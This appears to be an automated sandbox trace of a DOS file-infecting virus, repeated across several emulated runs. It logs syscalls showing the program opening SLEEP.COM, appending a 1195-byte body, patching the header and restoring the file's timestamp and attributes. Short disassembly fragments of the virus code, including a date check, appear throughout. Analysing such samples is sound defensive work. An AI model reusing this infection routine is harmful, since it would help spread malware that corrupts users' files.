    0x12b57: je 0x12b5c
    0x12b59: jmp 0x12da2
    0x12b5c: jmp 0x12d37
    0x12b5f: and ah, bh
    0x12b61: movsw word ptr es:[di], word ptr [si]
    0x12b62: mov ax, 0x5c4c
    0x12b65: add word ptr [di], ax
    0x12b67: add byte ptr [di - 0x75], dl
    0x12b6a: in al, dx
    0x12b6b: sub sp, 0x2c
    0x12b6e: push si
    0x12b6f: jmp 0x12be0
    0x12b71: mov ah, 0x1a
    0x12b73: lea dx, word ptr [bp - 0x2c]
    0x12b76: int 0x21
    0x12b78: mov ah, 0x4e
    0x12b7a: mov cx, 0x10
    0x12b7d: mov dx, 0x1a2
    0x12b80: add dx, word ptr [0x106]
2018-12-25T11:48:40.989797463Z 59 PC: 12dad | Change current directory
2018-12-25T11:48:40.994150362Z 59 PC: 12db4 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":3146,"SideJobID":0}

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:48:40.684290618Z 71 PC: 12b2d | Get current directory
2018-12-25T11:48:40.687607957Z 59 PC: 12b38 | Change current directory
2018-12-25T11:48:40.691471002Z 26 PC: 12beb | Set disk transfer address
2018-12-25T11:48:40.69280335Z 78 PC: 12bf9 | Find first file
2018-12-25T11:48:40.704403419Z 61 PC: 12c24 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:40.71097979Z 63 PC: 12c36 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T11:48:40.717270854Z 44 PC: 12c9e | Get time
    0x12c9e: add dl, dh
    0x12ca0: je 0x12c9a
    0x12ca2: mov si, 0x115
    0x12ca5: add si, word ptr [0x106]
    0x12ca9: mov byte ptr [si], dl
    0x12cab: mov ax, 0x4301
    0x12cae: xor cx, cx
    0x12cb0: mov dx, si
    0x12cb2: add dx, 0xb4
    0x12cb6: int 0x21
    0x12cb8: mov ah, 0x3e
    0x12cba: int 0x21
    0x12cbc: mov ax, 0x3d02
    0x12cbf: int 0x21
    0x12cc1: jb 0x12c45
    0x12cc3: mov di, dx
    0x12cc5: add di, 0x5d
    0x12cc8: stosw word ptr es:[di], ax
    0x12cc9: xchg ax, bx
    0x12cca: mov ah, 0x40
2018-12-25T11:48:40.720752621Z 67 PC: 12cb8 | Get or set file attributes
2018-12-25T11:48:40.735769928Z 62 PC: 12cbc | Close file
2018-12-25T11:48:40.737537761Z 61 PC: 12cc1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:40.745399013Z 64 PC: 12cd4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:48:40.748229658Z 64 PC: 12ce6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:40.750657715Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:40.753627165Z 66 PC: 12d04 | Move file pointer
2018-12-25T11:48:40.755651856Z 64 PC: 12a82 | Write file or device (Write 1195 bytes on handle 5)
2018-12-25T11:48:40.764623235Z 87 PC: 12d1d | Get or set file date and time
2018-12-25T11:48:40.766484746Z 62 PC: 12d21 | Close file
2018-12-25T11:48:40.774753646Z 67 PC: 12d32 | Get or set file attributes
2018-12-25T11:48:40.784211359Z 79 PC: 12c0c | Find next file
2018-12-25T11:48:40.786984129Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:40.793586455Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:40.799719974Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:40.801676148Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:40.820640069Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:40.822631202Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:40.828976705Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:40.832158159Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:40.834706592Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:40.837105291Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:40.839362612Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:40.848470908Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:40.849874379Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:40.857862536Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:40.867478528Z 79 PC: 12c0c | Find next file (See above)
2018-12-25T11:48:40.870277094Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:40.877418021Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:40.883710512Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:40.885785094Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:40.896328195Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:40.900968341Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:40.912956621Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:40.921536022Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:40.924097222Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:40.926570324Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:40.928494741Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:40.937747985Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:40.939960473Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:40.948232898Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:40.960030763Z 42 PC: 12b53 | Get date
    0x12b53: cmp dx, 0x606
    0x12b57: je 0x12b5c
    0x12b59: jmp 0x12da2
    0x12b5c: jmp 0x12d37
    0x12b5f: and ah, bh
    0x12b61: movsw word ptr es:[di], word ptr [si]
    0x12b62: mov ax, 0x5c4c
    0x12b65: add word ptr [di], ax
    0x12b67: add byte ptr [di - 0x75], dl
    0x12b6a: in al, dx
    0x12b6b: sub sp, 0x2c
    0x12b6e: push si
    0x12b6f: jmp 0x12be0
    0x12b71: mov ah, 0x1a
    0x12b73: lea dx, word ptr [bp - 0x2c]
    0x12b76: int 0x21
    0x12b78: mov ah, 0x4e
    0x12b7a: mov cx, 0x10
    0x12b7d: mov dx, 0x1a2
    0x12b80: add dx, word ptr [0x106]
2018-12-25T11:48:40.962039971Z 59 PC: 12dad | Change current directory
2018-12-25T11:48:40.966273778Z 59 PC: 12db4 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":3146,"SideJobID":0}

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:48:40.865044522Z 71 PC: 12b2d | Get current directory
2018-12-25T11:48:40.869679659Z 59 PC: 12b38 | Change current directory
2018-12-25T11:48:40.872893922Z 26 PC: 12beb | Set disk transfer address
2018-12-25T11:48:40.873991276Z 78 PC: 12bf9 | Find first file
2018-12-25T11:48:40.883143006Z 61 PC: 12c24 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:40.896125796Z 63 PC: 12c36 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T11:48:40.904016737Z 44 PC: 12c9e | Get time
    0x12c9e: add dl, dh
    0x12ca0: je 0x12c9a
    0x12ca2: mov si, 0x115
    0x12ca5: add si, word ptr [0x106]
    0x12ca9: mov byte ptr [si], dl
    0x12cab: mov ax, 0x4301
    0x12cae: xor cx, cx
    0x12cb0: mov dx, si
    0x12cb2: add dx, 0xb4
    0x12cb6: int 0x21
    0x12cb8: mov ah, 0x3e
    0x12cba: int 0x21
    0x12cbc: mov ax, 0x3d02
    0x12cbf: int 0x21
    0x12cc1: jb 0x12c45
    0x12cc3: mov di, dx
    0x12cc5: add di, 0x5d
    0x12cc8: stosw word ptr es:[di], ax
    0x12cc9: xchg ax, bx
    0x12cca: mov ah, 0x40
2018-12-25T11:48:40.90693429Z 67 PC: 12cb8 | Get or set file attributes
2018-12-25T11:48:40.924772897Z 62 PC: 12cbc | Close file
2018-12-25T11:48:40.927836093Z 61 PC: 12cc1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:40.935283137Z 64 PC: 12cd4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:48:40.939170118Z 64 PC: 12ce6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:40.943568122Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:40.947514287Z 66 PC: 12d04 | Move file pointer
2018-12-25T11:48:40.951484264Z 64 PC: 12a82 | Write file or device (Write 1195 bytes on handle 5)
2018-12-25T11:48:40.962072473Z 87 PC: 12d1d | Get or set file date and time
2018-12-25T11:48:40.964278799Z 62 PC: 12d21 | Close file
2018-12-25T11:48:40.974094937Z 67 PC: 12d32 | Get or set file attributes
2018-12-25T11:48:40.986258247Z 79 PC: 12c0c | Find next file
2018-12-25T11:48:40.989880719Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:40.997539528Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:41.005338469Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:41.007807598Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:41.018563394Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:41.021314293Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:41.028558839Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:41.031624273Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:41.035312086Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:41.039102315Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:41.041220747Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:41.051883034Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:41.053561562Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:41.061976116Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:41.073693853Z 79 PC: 12c0c | Find next file (See above)
2018-12-25T11:48:41.076929088Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:41.084334049Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:41.092367839Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:41.095430156Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:41.106992131Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:41.109259209Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:41.117757635Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:41.121046949Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:41.123918475Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:41.127620909Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:41.129737212Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:41.153654308Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:41.156074521Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:41.161619956Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:41.168660063Z 42 PC: 12b53 | Get date
    0x12b53: cmp dx, 0x606
    0x12b57: je 0x12b5c
    0x12b59: jmp 0x12da2
    0x12b5c: jmp 0x12d37
    0x12b5f: and ah, bh
    0x12b61: movsw word ptr es:[di], word ptr [si]
    0x12b62: mov ax, 0x5c4c
    0x12b65: add word ptr [di], ax
    0x12b67: add byte ptr [di - 0x75], dl
    0x12b6a: in al, dx
    0x12b6b: sub sp, 0x2c
    0x12b6e: push si
    0x12b6f: jmp 0x12be0
    0x12b71: mov ah, 0x1a
    0x12b73: lea dx, word ptr [bp - 0x2c]
    0x12b76: int 0x21
    0x12b78: mov ah, 0x4e
    0x12b7a: mov cx, 0x10
    0x12b7d: mov dx, 0x1a2
    0x12b80: add dx, word ptr [0x106]
2018-12-25T11:48:41.170355287Z 59 PC: 12dad | Change current directory
2018-12-25T11:48:41.173072246Z 59 PC: 12db4 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":3146,"SideJobID":0}

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:48:40.889294413Z 71 PC: 12b2d | Get current directory
2018-12-25T11:48:40.893419096Z 59 PC: 12b38 | Change current directory
2018-12-25T11:48:40.898231302Z 26 PC: 12beb | Set disk transfer address
2018-12-25T11:48:40.899609573Z 78 PC: 12bf9 | Find first file
2018-12-25T11:48:40.906514439Z 61 PC: 12c24 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:40.911224946Z 63 PC: 12c36 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T11:48:40.91811595Z 44 PC: 12c9e | Get time
    0x12c9e: add dl, dh
    0x12ca0: je 0x12c9a
    0x12ca2: mov si, 0x115
    0x12ca5: add si, word ptr [0x106]
    0x12ca9: mov byte ptr [si], dl
    0x12cab: mov ax, 0x4301
    0x12cae: xor cx, cx
    0x12cb0: mov dx, si
    0x12cb2: add dx, 0xb4
    0x12cb6: int 0x21
    0x12cb8: mov ah, 0x3e
    0x12cba: int 0x21
    0x12cbc: mov ax, 0x3d02
    0x12cbf: int 0x21
    0x12cc1: jb 0x12c45
    0x12cc3: mov di, dx
    0x12cc5: add di, 0x5d
    0x12cc8: stosw word ptr es:[di], ax
    0x12cc9: xchg ax, bx
    0x12cca: mov ah, 0x40
2018-12-25T11:48:40.920392516Z 67 PC: 12cb8 | Get or set file attributes
2018-12-25T11:48:40.942548091Z 62 PC: 12cbc | Close file
2018-12-25T11:48:40.944618041Z 61 PC: 12cc1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:40.952190853Z 64 PC: 12cd4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:48:40.960653653Z 64 PC: 12ce6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:40.963670265Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:40.966813545Z 66 PC: 12d04 | Move file pointer
2018-12-25T11:48:40.969633911Z 64 PC: 12a82 | Write file or device (Write 1195 bytes on handle 5)
2018-12-25T11:48:40.979829672Z 87 PC: 12d1d | Get or set file date and time
2018-12-25T11:48:40.981337829Z 62 PC: 12d21 | Close file
2018-12-25T11:48:40.991802433Z 67 PC: 12d32 | Get or set file attributes
2018-12-25T11:48:41.003628334Z 79 PC: 12c0c | Find next file
2018-12-25T11:48:41.007737401Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:41.015350625Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:41.023586131Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:41.026025804Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:41.037325249Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:41.040237067Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:41.04791273Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:41.051303065Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:41.055005948Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:41.057668612Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:41.059645799Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:41.070879119Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:41.073402996Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:41.082679776Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:41.094850491Z 79 PC: 12c0c | Find next file (See above)
2018-12-25T11:48:41.097754953Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:41.104574937Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:41.111988198Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:41.114166188Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:41.124522792Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:41.128086105Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:41.136241307Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:41.13916752Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:41.141929574Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:41.145530323Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:41.147493166Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:41.157043808Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:41.15893193Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:41.166713868Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:41.17721235Z 42 PC: 12b53 | Get date
    0x12b53: cmp dx, 0x606
    0x12b57: je 0x12b5c
    0x12b59: jmp 0x12da2
    0x12b5c: jmp 0x12d37
    0x12b5f: and ah, bh
    0x12b61: movsw word ptr es:[di], word ptr [si]
    0x12b62: mov ax, 0x5c4c
    0x12b65: add word ptr [di], ax
    0x12b67: add byte ptr [di - 0x75], dl
    0x12b6a: in al, dx
    0x12b6b: sub sp, 0x2c
    0x12b6e: push si
    0x12b6f: jmp 0x12be0
    0x12b71: mov ah, 0x1a
    0x12b73: lea dx, word ptr [bp - 0x2c]
    0x12b76: int 0x21
    0x12b78: mov ah, 0x4e
    0x12b7a: mov cx, 0x10
    0x12b7d: mov dx, 0x1a2
    0x12b80: add dx, word ptr [0x106]
2018-12-25T11:48:41.180477403Z 59 PC: 12dad | Change current directory
2018-12-25T11:48:41.18480884Z 59 PC: 12db4 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":3146,"SideJobID":0}

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:48:41.191246766Z 71 PC: 12b2d | Get current directory
2018-12-25T11:48:41.195335193Z 59 PC: 12b38 | Change current directory
2018-12-25T11:48:41.199603134Z 26 PC: 12beb | Set disk transfer address
2018-12-25T11:48:41.202465726Z 78 PC: 12bf9 | Find first file
2018-12-25T11:48:41.20963131Z 61 PC: 12c24 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:41.216407483Z 63 PC: 12c36 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T11:48:41.230871833Z 44 PC: 12c9e | Get time
    0x12c9e: add dl, dh
    0x12ca0: je 0x12c9a
    0x12ca2: mov si, 0x115
    0x12ca5: add si, word ptr [0x106]
    0x12ca9: mov byte ptr [si], dl
    0x12cab: mov ax, 0x4301
    0x12cae: xor cx, cx
    0x12cb0: mov dx, si
    0x12cb2: add dx, 0xb4
    0x12cb6: int 0x21
    0x12cb8: mov ah, 0x3e
    0x12cba: int 0x21
    0x12cbc: mov ax, 0x3d02
    0x12cbf: int 0x21
    0x12cc1: jb 0x12c45
    0x12cc3: mov di, dx
    0x12cc5: add di, 0x5d
    0x12cc8: stosw word ptr es:[di], ax
    0x12cc9: xchg ax, bx
    0x12cca: mov ah, 0x40
2018-12-25T11:48:41.233004901Z 67 PC: 12cb8 | Get or set file attributes
2018-12-25T11:48:41.250507714Z 62 PC: 12cbc | Close file
2018-12-25T11:48:41.254798564Z 61 PC: 12cc1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:41.261522117Z 64 PC: 12cd4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:48:41.265026221Z 64 PC: 12ce6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:41.269348452Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:41.272682618Z 66 PC: 12d04 | Move file pointer
2018-12-25T11:48:41.27786362Z 64 PC: 12a82 | Write file or device (Write 1195 bytes on handle 5)
2018-12-25T11:48:41.289676739Z 87 PC: 12d1d | Get or set file date and time
2018-12-25T11:48:41.291385217Z 62 PC: 12d21 | Close file
2018-12-25T11:48:41.301325148Z 67 PC: 12d32 | Get or set file attributes
2018-12-25T11:48:41.311713159Z 79 PC: 12c0c | Find next file
2018-12-25T11:48:41.31422212Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:41.321375085Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:41.32786175Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:41.329920934Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:41.340981941Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:41.343120003Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:41.350330974Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:41.35466812Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:41.373110661Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:41.375957659Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:41.378203739Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:41.387313138Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:41.388745452Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:41.396322514Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:41.42856618Z 79 PC: 12c0c | Find next file (See above)
2018-12-25T11:48:41.431915138Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:41.43865455Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:41.447955279Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:41.450046899Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:41.459943977Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:41.462962013Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:41.469894919Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:41.47316463Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:41.477429727Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:41.480004294Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:41.481758855Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:41.491869706Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:41.493469839Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:41.501078307Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:41.511614698Z 42 PC: 12b53 | Get date
0x12b53: cmp dx, 0x606
0x12b57: je 0x12b5c
0x12b59: jmp 0x12da2
0x12b5c: jmp 0x12d37
0x12b5f: and ah, bh
0x12b61: movsw word ptr es:[di], word ptr [si]
0x12b62: mov ax, 0x5c4c
0x12b65: add word ptr [di], ax
0x12b67: add byte ptr [di - 0x75], dl
0x12b6a: in al, dx
0x12b6b: sub sp, 0x2c
0x12b6e: push si
0x12b6f: jmp 0x12be0
0x12b71: mov ah, 0x1a
0x12b73: lea dx, word ptr [bp - 0x2c]
0x12b76: int 0x21
0x12b78: mov ah, 0x4e
0x12b7a: mov cx, 0x10
0x12b7d: mov dx, 0x1a2
0x12b80: add dx, word ptr [0x106]
2018-12-25T11:48:41.513889138Z 59 PC: 12dad | Change current directory
2018-12-25T11:48:41.517878219Z 59 PC: 12db4 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":3146,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:48:41.43641556Z 71 PC: 12b2d | Get current directory
2018-12-25T11:48:41.440308399Z 59 PC: 12b38 | Change current directory
2018-12-25T11:48:41.445856702Z 26 PC: 12beb | Set disk transfer address
2018-12-25T11:48:41.447362811Z 78 PC: 12bf9 | Find first file
2018-12-25T11:48:41.455801872Z 61 PC: 12c24 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:41.460548537Z 63 PC: 12c36 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T11:48:41.464816332Z 44 PC: 12c9e | Get time
0x12c9e: add dl, dh
0x12ca0: je 0x12c9a
0x12ca2: mov si, 0x115
0x12ca5: add si, word ptr [0x106]
0x12ca9: mov byte ptr [si], dl
0x12cab: mov ax, 0x4301
0x12cae: xor cx, cx
0x12cb0: mov dx, si
0x12cb2: add dx, 0xb4
0x12cb6: int 0x21
0x12cb8: mov ah, 0x3e
0x12cba: int 0x21
0x12cbc: mov ax, 0x3d02
0x12cbf: int 0x21
0x12cc1: jb 0x12c45
0x12cc3: mov di, dx
0x12cc5: add di, 0x5d
0x12cc8: stosw word ptr es:[di], ax
0x12cc9: xchg ax, bx
0x12cca: mov ah, 0x40
2018-12-25T11:48:41.466441579Z 67 PC: 12cb8 | Get or set file attributes
2018-12-25T11:48:41.481782073Z 62 PC: 12cbc | Close file
2018-12-25T11:48:41.484410472Z 61 PC: 12cc1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:41.497798222Z 64 PC: 12cd4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:48:41.507929432Z 64 PC: 12ce6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:41.51100344Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:41.513884462Z 66 PC: 12d04 | Move file pointer
2018-12-25T11:48:41.51633929Z 64 PC: 12a82 | Write file or device (Write 1195 bytes on handle 5)
2018-12-25T11:48:41.528197774Z 87 PC: 12d1d | Get or set file date and time
2018-12-25T11:48:41.529902403Z 62 PC: 12d21 | Close file
2018-12-25T11:48:41.538481851Z 67 PC: 12d32 | Get or set file attributes
2018-12-25T11:48:41.552825406Z 79 PC: 12c0c | Find next file
2018-12-25T11:48:41.556089098Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:41.564510912Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:41.572498252Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:41.574919686Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:41.58666348Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:41.589939613Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:41.597559474Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:41.600910144Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:41.604988419Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:41.608487221Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:41.610696809Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:41.622690874Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:41.625175774Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:41.634314674Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:41.645167457Z 79 PC: 12c0c | Find next file (See above)
2018-12-25T11:48:41.648194999Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:41.655387347Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:41.662504128Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:41.665070695Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:41.675947568Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:41.677785429Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:41.685857102Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:41.689082574Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:41.693229549Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:41.697135053Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:41.699704474Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:41.709876755Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:41.712258262Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:41.721244773Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:41.732157561Z 42 PC: 12b53 | Get date
0x12b53: cmp dx, 0x606
0x12b57: je 0x12b5c
0x12b59: jmp 0x12da2
0x12b5c: jmp 0x12d37
0x12b5f: and ah, bh
0x12b61: movsw word ptr es:[di], word ptr [si]
0x12b62: mov ax, 0x5c4c
0x12b65: add word ptr [di], ax
0x12b67: add byte ptr [di - 0x75], dl
0x12b6a: in al, dx
0x12b6b: sub sp, 0x2c
0x12b6e: push si
0x12b6f: jmp 0x12be0
0x12b71: mov ah, 0x1a
0x12b73: lea dx, word ptr [bp - 0x2c]
0x12b76: int 0x21
0x12b78: mov ah, 0x4e
0x12b7a: mov cx, 0x10
0x12b7d: mov dx, 0x1a2
0x12b80: add dx, word ptr [0x106]
2018-12-25T11:48:41.735161007Z 59 PC: 12dad | Change current directory
2018-12-25T11:48:41.739913139Z 59 PC: 12db4 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":3146,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:48:41.771721633Z 71 PC: 12b2d | Get current directory
2018-12-25T11:48:41.777589381Z 59 PC: 12b38 | Change current directory
2018-12-25T11:48:41.781848625Z 26 PC: 12beb | Set disk transfer address
